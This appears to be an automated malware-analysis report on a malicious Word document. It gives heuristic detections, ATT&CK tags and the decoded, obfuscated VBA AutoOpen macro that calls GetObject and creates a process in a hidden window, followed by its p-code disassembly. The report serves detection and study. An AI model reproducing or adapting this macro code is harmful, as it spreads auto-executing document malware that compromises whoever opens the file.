MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing legacy WordBasic macro markers and a detected VBA AutoOpen macro. The heuristic firings indicate the use of GetObject, a common technique for executing arbitrary code. The ClamAV detection further confirms its malicious nature. The VBA script is heavily obfuscated, but the presence of AutoOpen and GetObject suggests an attempt to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Malware.Dsau-6904244-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dsau-6904244-0
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set awcDAXDw = GetObject(ExAADAAB + sAxoAx.E4w_Ak + GZUAB1) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13011 bytes |
SHA-256: baba40b12a1d5a456368db625ccb2e4fc25aec56cf5da013ca735dd868800d91 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZDGQBc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sAxoAx"
Attribute VB_Base = "0{B00C1D2A-0EC5-4834-BD52-55DCDDDB556B}{E8DB5D3B-4C2A-40DF-A84C-3A33A884B904}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "WDBBAQA"
Sub autoopen()
On Error Resume Next
If SGAQDA = O1U_A4G Then
XQBBXB = (354164903)
Rkxc1cAD = (uAXZcA_B * Log(185537904 + Atn(90458249 * ZUAAUw_)) + XBwAAA1c + CDbl(PAcGXA - Sqr(UUxABAoA / CBool(619123844 / 648437584) + GoAo_wc - Rnd(lXBQcwAZ))) * 717692923 * 140857080)
SD_A1A = (876277793)
End If
If joxXB_A = zw1kAo Then
ABCBXAAU = (907333972)
kDDwxZ = (Dw1A1U * Log(906077285 + Atn(939496631 * ABGwAUA)) + Z4DQCDAw + CDbl(wA4A4xA - Sqr(jA11_x / CBool(904290008 / 247771865) + Qc4AA4A - Rnd(TUwAkDZ))) * 104070901 * 407975498)
K1GQ4A = (208115342)
End If
If vAkDw4_ = YXAXAx Then
w1DAAAk = (911857544)
V_1AAA_ = (iQAwZUU * Log(699515691 + Atn(578272690 * fCwUAZQQ)) + A_AXDQQA + CDbl(lBAUAXAB - Sqr(jQAAA_ / CBool(234002449 / 875593952) + GG_BGDDx - Rnd(joUoAQAQ))) * 484803153 * 720327324)
WZX_1x = (386064342)
End If
Set awcDAXDw = GetObject(ExAADAAB + sAxoAx.E4w_Ak + GZUAB1)
If zDBAxA = i1AAAxAw Then
BB4ZcQ = (370313042)
wxABAAZ = (BoUABGQA * Log(312109724 + Atn(756444821 * wB_xAB)) + UAADAAB + CDbl(TBGwAXX - Sqr(NAABw4A / CBool(175736737 / 990808190) + s41xDA - Rnd(SAABBU))) * 930200640 * 173715715)
iD1AA4 = (573405040)
End If
If howAUx = tcBQA1 Then
JUD1Ux4A = (587887753)
rCU_ZB = (cUQG4AZZ * Log(697222529 + Atn(285234511 * EAAZADo)) + PBAAcCD + CDbl(EAC4BQU - Sqr(LAZoD1x / CBool(942634415 / 929334407) + KACAAAAA - Rnd(EAxXXUA))) * 480444825 * 68796775)
K4GBAU = (230801638)
End If
If KAxAGDA4 = LDXCAk Then
zkBAoGcA = (543619911)
vQABAB = (LZQA1AC_ * Log(55987397 + Atn(23136848 * YCA_AX)) + R1ABw_ + CDbl(uZADAwD - Sqr(UAQAwA / CBool(730719312 / 839687655) + z4BACZC - Rnd(iAZAA_BB))) * 984468410 * 611468616)
dcAAC4 = (239226092)
End If
awcDAXDw.ShowWindow = 711727 - 711727
If zQAwQXA = QBc4C_A Then
kADBAAA = (450440259)
nAwDBcU = (sAUwAw * Log(473041508 + Atn(688292563 * jAZoGAU)) + a1DD__ + CDbl(FQk4AAA - Sqr(OBA4AC4A / CBool(49112116 / 526349501) + bC_QQAc - Rnd(wQAoDAU))) * 20994649 * 425511610)
uQBQ_QU = (364955007)
End If
If XQQUAw = CUAwow Then
VAokkBw = (919364621)
OGCQDA = (wA_4ZDk * Log(6426374 + Atn(849015688 * TAA4QDA)) + u4QBBA + CDbl(NQAwwD1X - Sqr(GQxkcAZA / CBool(37212185 / 126409053) + WAxGAA4 - Rnd(tUDAAc))) * 179336256 * 152281553)
UD1QD1Q4 = (646481162)
End If
GetObject(wwcBBGA + sAxoAx.cDDAAAxB + HwQAD4UA). _
Create@ pACA_A + sAxoAx.NBwA1D + QcAAADBB + sAxoAx.Z4AkAkZ + pDAXUowA + sAxoAx.wkUQUBZA + YoB1D1_, QZAAAZAQ, awcDAXDw, WAwGAAA_
If wACxAUQ = HcBDQA Then
mGAU4Ac_ = (648909886)
sD4xBUAC = (a4ADAUk * Log(380977896 + Atn(920961872 * YAGCAA)) + wQZUCAA + CDbl(zUBcCAwD - Sqr(oxBDAxQ / CBool(388970675 / 942189567) + WG4AxD - Rnd(ZAGoAUwA))) * 60028052 * 537514096)
sAkQZA_ = (777214553)
End If
If IAxUDAB = nGBAGw Then
SAABAo4 = (613193940)
sXAAwUAo = (LAU4xC4w * Log(69644910 + Atn(179403780 * ZCCG1Ak)) + EAAACcD + CDbl(EQAQAwwA - Sqr(NUQAAA / CBool(682560908 / 94327741) + VAAx1AU - Rnd(DcAQwDQD))) * 958521476 * 626994569)
NDAAxQU = (677554219)
End If
If qZDDDA = I4D4cCA Then
sUo1CXAQ = (284786612)
QG4UoC = (lDwACQAo * Log(537229880 + Atn(964221077 * jXAZDoco)) + cQDUkZxG + CDbl(cDAAAQ - Sqr(KAUBAoQ / CBool(117643941 / 936060523) + wCQQBA - Rnd(LAABBww))) * 148071599 * 533879942)
sACZGcA = (967372682)
End If
End Sub
' Processing file: /tmp/qstore_tbwpkwd8
' ===============================================================================
' Module streams:
' Macros/VBA/ZDGQBc - 1104 bytes
' Macros/VBA/sAxoAx - 1154 bytes
' Macros/VBA/WDBBAQA - 6138 bytes
' Line #0:
' FuncDefn (Sub WDBBAQA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld SGAQDA
' Eq
' IfBlock
' Line #3:
' LitDI4 0x20A7 0x151C
' Paren
' St O1U_A4G
' Line #4:
' Ld Rkxc1cAD
' LitDI4 0x1570 0x0B0F
' LitDI4 0x4889 0x0564
' Ld uAXZcA_B
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ZUAAUw_
' Add
' Ld XBwAAA1c
' Ld PAcGXA
' LitDI4 0x1484 0x24E7
' LitDI4 0x5F50 0x26A6
' Div
' Coerce (Bool)
' Div
' Ld UUxABAoA
' Add
' Ld GoAo_wc
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x1FFB 0x2AC7
' Mul
' LitDI4 0x4EF8 0x0865
' Mul
' Add
' Paren
' St XQBBXB
' Line #5:
' LitDI4 0xF021 0x343A
' Paren
' St lXBQcwAZ
' Line #6:
' EndIfBlock
' Line #7:
' Ld SD_A1A
' Ld joxXB_A
' Eq
' IfBlock
' Line #8:
' LitDI4 0xD154 0x3614
' Paren
' St zw1kAo
' Line #9:
' Ld kDDwxZ
' LitDI4 0xA465 0x3601
' LitDI4 0x94B7 0x37FF
' Ld Dw1A1U
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ABGwAUA
' Add
' Ld Z4DQCDAw
' Ld wA4A4xA
' LitDI4 0x5ED8 0x35E6
' LitDI4 0xB2D9 0x0EC4
' Div
' Coerce (Bool)
' Div
' Ld jA11_x
' Add
' Ld Qc4AA4A
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xFEF5 0x0633
' Mul
' LitDI4 0x364A 0x1851
' Mul
' Add
' Paren
' St ABCBXAAU
' Line #10:
' LitDI4 0x968E 0x0C67
' Paren
' St TUwAkDZ
' Line #11:
' EndIfBlock
' Line #12:
' Ld K1GQ4A
' Ld vAkDw4_
' Eq
' IfBlock
' Line #13:
' LitDI4 0xD788 0x3659
' Paren
' St YXAXAx
' Line #14:
' Ld V_1AAA_
' LitDI4 0xC32B 0x29B1
' LitDI4 0xBDB2 0x2277
' Ld iQAwZUU
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld fCwUAZQQ
' Add
' Ld A_AXDQQA
' Ld lBAUAXAB
' LitDI4 0x9811 0x0DF2
' LitDI4 0x80E0 0x3430
' Div
' Coerce (Bool)
' Div
' Ld jQAAA_
' Add
' Ld GG_BGDDx
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x8251 0x1CE5
' Mul
' LitDI4 0x529C 0x2AEF
' Mul
' Add
' Paren
' St w1DAAAk
' Line #15:
' LitDI4 0xDFD6 0x1702
' Paren
' St joUoAQAQ
' Line #16:
' EndIfBlock
' Line #17:
' SetStmt
' Ld GetObject
' Ld MSForms
' MemLd ExAADAAB
' Add
' Ld E4w_Ak
' Add
' ArgsLd awcDAXDw 0x0001
' Set WZX_1x
' Line #18:
' Ld GZUAB1
' Ld zDBAxA
' Eq
' IfBlock
' Line #19:
' LitDI4 0x8752 0x1612
' Paren
' St i1AAAxAw
' Line #20:
' Ld wxABAAZ
' LitDI4 0x6A9C 0x129A
' LitDI4 0x6E95 0x2D16
' Ld BoUABGQA
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld wB_xAB
' Add
' Ld UAADAAB
' Ld TBGwAXX
' LitDI4 0x87A1 0x0A79
' LitDI4 0x887E 0x3B0E
' Div
' Coerce (Bool)
' Div
' Ld NAABw4A
' Add
' Ld s41xDA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xBC40 0x3771
' Mul
' LitDI4 0xB103 0x0A5A
' Mul
' Add
' Paren
' St BB4ZcQ
' Line #21:
' LitDI4 0x7770 0x222D
' Paren
' St SAABBU
' Line #22:
' EndIfBlock
' Line #23:
' Ld iD1AA4
' Ld howAUx
' Eq
' IfBlock
' Line #24:
' LitDI4 0x7489 0x230A
' Paren
' St tcBQA1
' Line #25:
' Ld rCU_ZB
' LitDI4 0xC581 0x298E
' LitDI4 0x554F 0x1100
' Ld cUQG4AZZ
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld EAAZADo
' Add
' Ld PBAAcCD
' Ld EAC4BQU
' LitDI4 0x75AF 0x382F
' LitDI4 0x8487 0x3764
' Div
' Coerce (Bool)
' Div
' Ld LAZoD1x
' Add
' Ld KACAAAAA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x0199 0x1CA3
' Mul
' LitDI4 0xC167 0x0419
' Mul
' Add
' Paren
' St JUD1Ux4A
' Line #26:
' LitDI4 0xC0E6 0x0DC1
' Paren
' St EAxXXUA
' Line #27:
' EndIfBlock
' Line #28:
' Ld K4GBAU
' Ld KAxAGDA4
' Eq
' IfBlock
' Line #29:
' LitDI4 0xFB47 0x2066
' Paren
' St LDXCAk
' Line #30:
' Ld vQABAB
' LitDI4 0x4CC5 0x0356
' LitDI4 0x0A50 0x0161
' Ld LZQA1AC_
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld YCA_AX
' Add
' Ld R1ABw_
' Ld uZADAwD
' LitDI4 0xE450 0x2B8D
' LitDI4 0x9DE7 0x320C
' Div
' Coerce (Bool)
' Div
' Ld UAQAwA
' Add
' Ld z4BACZC
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xCBBA 0x3AAD
' Mul
' LitDI4 0x4548 0x2472
' Mul
' Add
' Paren
' St zkBAoGcA
' Line #31:
' LitDI4 0x4CEC 0x0E42
' Paren
' St iAZAA_BB
' Line #32:
' EndIfBlock
' Line #33:
' LitDI4 0xDC2F 0x000A
' LitDI4 0xDC2F 0x000A
' Sub
' Ld WZX_1x
' MemSt dcAAC4
' Line #34:
' Ld ShowWindow
' Ld zQAwQXA
' Eq
' IfBlock
' Line #35:
' LitDI4 0x2C43 0x1AD9
' Paren
' St QBc4C_A
' Line #36:
' Ld nAwDBcU
' LitDI4 0x0A64 0x1C32
' LitDI4 0x82D3 0x2906
' Ld sAUwAw
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld jAZoGAU
' Add
' Ld a1DD__
' Ld FQk4AAA
' LitDI4 0x6434 0x02ED
' LitDI4 0x74BD 0x1F5F
' Div
' Coerce (Bool)
' Div
' Ld OBA4AC4A
' Add
' Ld bC_QQAc
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x5A59 0x0140
' Mul
' LitDI4 0xCABA 0x195C
' Mul
' Add
' Paren
' St kADBAAA
' Line #37:
' LitDI4 0xC57F 0x15C0
' Paren
' St wQAoDAU
' Line #38:
' EndIfBlock
' Line #39:
' Ld uQBQ_QU
' Ld XQQUAw
' Eq
' IfBlock
' Line #40:
' LitDI4 0x640D 0x36CC
' Paren
' St CUAwow
' Line #41:
' Ld OGCQDA
' LitDI4 0x0F06 0x0062
' LitDI4 0xF388 0x329A
' Ld wA_4ZDk
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld TAA4QDA
' Add
' Ld u4QBBA
' Ld NQAwwD1X
' LitDI4 0xD019 0x0237
' LitDI4 0xD95D 0x0788
' Div
' Coerce (Bool)
' Div
' Ld GQxkcAZA
' Add
' Ld WAxGAA4
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x7440 0x0AB0
' Mul
' LitDI4 0xA1D1 0x0913
' Mul
' Add
' Paren
' St VAokkBw
' Line #42:
' LitDI4 0x850A 0x2688
' Paren
' St tUDAAc
' Line #43:
' EndIfBlock
' Line #44:
' LineCont 0x0004 0B 00 00 00
' Ld Create
' Ld MSForms
' MemLd pACA_A
' Add
' Ld NBwA1D
' Add
' Ld MSForms
' MemLd QcAAADBB
' Add
' Ld Z4AkAkZ
' Add
' Ld MSForms
' MemLd pDAXUowA
' Add
' Ld wkUQUBZA
' Add
' Ld YoB1D1_
' Ld WZX_1x
' Ld QZAAAZAQ
' Ld UD1QD1Q4
' Ld MSForms
' MemLd wwcBBGA
' Add
' Ld cDDAAAxB
' Add
' ArgsLd awcDAXDw 0x0001
' ArgsMemCall HwQAD4UA@ 0x0004
' Line #45:
' Ld WAwGAAA_
' Ld wACxAUQ
' Eq
' IfBlock
' Line #46:
' LitDI4 0x943E 0x26AD
' Paren
' St HcBDQA
' Line #47:
' Ld sD4xBUAC
' LitDI4 0x42E8 0x16B5
' LitDI4 0xC350 0x36E4
' Ld a4ADAUk
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld YAGCAA
' Add
' Ld wQZUCAA
' Ld zUBcCAwD
' LitDI4 0x38B3 0x172F
' LitDI4 0xABFF 0x3828
' Div
' Coerce (Bool)
' Div
' Ld oxBDAxQ
' Add
' Ld WG4AxD
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xF494 0x0393
' Mul
' LitDI4 0xD070 0x2009
' Mul
' Add
' Paren
' St mGAU4Ac_
' Line #48:
' LitDI4 0x5A59 0x2E53
' Paren
' St ZAGoAUwA
' Line #49:
' EndIfBlock
' Line #50:
' Ld sAkQZA_
' Ld IAxUDAB
' Eq
' IfBlock
' Line #51:
' LitDI4 0x98D4 0x248C
' Paren
' St nGBAGw
' Line #52:
' Ld sXAAwUAo
' LitDI4 0xB26E 0x0426
' LitDI4 0x7C04 0x0AB1
' Ld LAU4xC4w
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ZCCG1Ak
' Add
' Ld EAAACcD
' Ld EQAQAwwA
' LitDI4 0x0D8C 0x28AF
' LitDI4 0x53BD 0x059F
' Div
' Coerce (Bool)
' Div
' Ld NUQAAA
' Add
' Ld VAAx1AU
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xE084 0x3921
' Mul
' LitDI4 0x2D89 0x255F
' Mul
' Add
' Paren
' St SAABAo4
' Line #53:
' LitDI4 0xA82B 0x2862
' Paren
' St DcAQwDQD
' Line #54:
' EndIfBlock
' Line #55:
' Ld NDAAxQU
' Ld qZDDDA
' Eq
' IfBlock
' Line #56:
' LitDI4 0x7FB4 0x10F9
' Paren
' St I4D4cCA
' Line #57:
' Ld QG4UoC
' LitDI4 0x7A38 0x2005
' LitDI4 0xD895 0x3978
' Ld lDwACQAo
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld jXAZDoco
' Add
' Ld cQDUkZxG
' Ld cDAAAQ
' LitDI4 0x1AA5 0x0703
' LitDI4 0x266B 0x37CB
' Div
' Coerce (Bool)
' Div
' Ld KAUBAoQ
' Add
' Ld wCQQBA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x64AF 0x08D3
' Mul
' LitDI4 0x5C86 0x1FD2
' Mul
' Add
' Paren
' St sUo1CXAQ
' Line #58:
' LitDI4 0xEF8A 0x39A8
' Paren
' St LAABBww
' Line #59:
' EndIfBlock
' Line #60:
' EndSub
' Line #61:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.